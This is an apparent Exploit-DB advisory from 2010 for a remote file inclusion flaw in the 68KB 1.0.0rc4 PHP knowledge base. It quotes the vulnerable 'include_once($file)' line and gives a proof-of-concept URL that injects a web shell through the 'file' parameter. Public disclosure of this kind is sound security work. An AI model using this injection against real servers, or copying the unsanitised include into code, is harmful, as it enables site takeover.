EXPLOITS

68KB 1.0.0rc4 - Remote File Inclusion

Author: eidelweiss
type: webapps
platform: php
port: 
date_added: 2010-08-03  
date_updated: 2010-08-08  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.com68designs-68KB-v1.0.0rc4-0-gac50576.tar.gz  

raw file: 14534.txt  

====================================================
68KB v1.0.0rc4 Remote File Include Vulnerability
====================================================

Vendor:     http://68kb.com
download:   http://github.com/68designs/68KB/downloads
Author:     eidelweiss
Contact:    g1xsystem[at]windowslive.com
Original Advisories :	http://eidelweiss-advisories.blogspot.com/2010/08/68kb-v100rc4-remote-file-include.html
=====================================================================

Description:
68KB is an open source PHP MySQL driven knowledge base script. Built with you in mind to make it easy to configure and setup.

Note:
This is the same vuln in other lower version (http://www.exploit-db.com/exploits/11904/)
Vendor Not Fix the vulnerability in all folder !!!

=====================================================================

    -=[ vuln c0de ]=-

[!] path/themes/admin/default/modules/show.php


	<?php include_once($file); ?>

=====================================================================

    -=[ P0C ]=-

    http://127.0.0.1/path/themes/admin/default/modules/show.php?file= [inj3ct0r shell]

=========================| -=[ E0F ]=- |=================================